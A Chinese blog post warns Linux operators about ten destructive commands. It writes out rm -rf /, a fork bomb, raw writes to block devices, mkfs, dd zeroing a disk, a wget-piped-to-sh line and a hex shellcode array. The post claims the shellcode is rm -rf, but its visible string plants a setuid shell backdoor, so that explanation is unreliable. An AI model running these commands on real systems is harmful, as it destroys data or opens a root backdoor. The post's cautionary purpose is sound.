Linux的10大危险命令

Posted 2022-08-22 bisal(Chen Liu)

作为运维来说，生产环境敲的每一个指令，都关系着自己和系统的前途，因此无论怎么慎重都不为过。看到一篇dbaplus社群的文章《Linux的10大危险命令，用过的运维都很刑！》，就给出了一些极为危险的指令，可以列入黑名单。

rm -rf 命令

该命令可能导致不可恢复的系统崩坏。

> rm -rf /  #强制删除根目录下所有东西。
> rm -rf *  #强制删除当前目录的所有文件。
> rm -rf .  #强制删除当前文件夹及其子文件夹。

执行rm -rf 一定要想半天，搞明白自己在干什么。

fork 炸弹

:()  :|:& ;:

不太好理解可以转换成：

bomb()

    bomb|bomb&
;
bomb

一旦执行起来，-bash: fork: Cannot allocate memory，会把系统资源消耗殆尽。他会调用自己两次，一次在前台另一次运行在后台。他会反复地执行下去直到系统崩溃。

echo "" > /dev/sda

该操作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

mv 文件夹 /dev/null

> mv /etc /dev/null

/dev/null或null设备是一个特殊的文件，所有写入他的数据都会被清除，然后返回写操作成功。但是这个命令并不能阻止数据恢复软件——所以，真正的彻底毁灭，需要采用专用的软件或者手法来完成。

下载的文件立即执行

> wget http://rumenz.com/rumenz.sh -O- | sh

如果rumenz.sh是一个病毒脚本,就完蛋了。下载脚本文件之前要看看里面的内容,有危险的操作就不要执行。

mkfs.ext3 /dev/sdb

这个命令会格式化块设备sdb，在执行这个命令后你的块设备(硬盘驱动器)会被格式化，直接让你的系统达到不可恢复的阶段。

重定向输出到文件

>  > rumenz.txt

这个命令常用来清空文件内容或记录命令输出,执行之前请考虑清楚。

^foo^bar

这个命令用来编辑先前运行的命令而无需重打整个命令。

用foobar命令时如果你没有彻底检查改变原始命令的风险，这可能导致真正的麻烦。

硬盘清零

> dd if=/dev/zero of=/dev/had

这个命令会将整个主硬盘清零。

执行伪装后的命令

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\\xeb\\x3e\\x5b\\x31\\xc0\\x50\\x54\\x5a\\x83\\xec\\x64\\x68″
“\\xff\\xff\\xff\\xff\\x68\\xdf\\xd0\\xdf\\xd9\\x68\\x8d\\x99″
“\\xdf\\x81\\x68\\x8d\\x92\\xdf\\xd2\\x54\\x5e\\xf7\\x16\\xf7″
“\\x56\\x04\\xf7\\x56\\x08\\xf7\\x56\\x0c\\x83\\xc4\\x74\\x56″
“\\x8d\\x73\\x08\\x56\\x53\\x54\\x59\\xb0\\x0b\\xcd\\x80\\x31″
“\\xc0\\x40\\xeb\\xf9\\xe8\\xbd\\xff\\xff\\xff\\x2f\\x62\\x69″
“\\x6e\\x2f\\x73\\x68\\x00\\x2d\\x63\\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

其实上面的命令就是rm -rf ，这里的代码是隐藏在十六进制里的，可能会擦除你的根分区。

因此，包括但不限于上面这些指令，只要是自己看不懂的，或者不太理解的，千万不能执行，一定了解清楚了，如果非得看效果，请在虚拟机中执行，而且建议都在虚拟机中执行一次，眼见为实，印象更加深刻。

近期更新的文章：

《你知道Oracle的数据文件大小有上限么？》

《Oracle和JSON的结合》

《脚本中如何"优雅"避免MySQL登录提示信息》

《小白学习MySQL - 增量统计SQL的需求 - 开窗函数的方案》

《国产数据库名录一览》

近期的热文：

《"红警"游戏开源代码带给我们的震撼》

文章分类和索引：

《公众号1000篇文章分类和索引》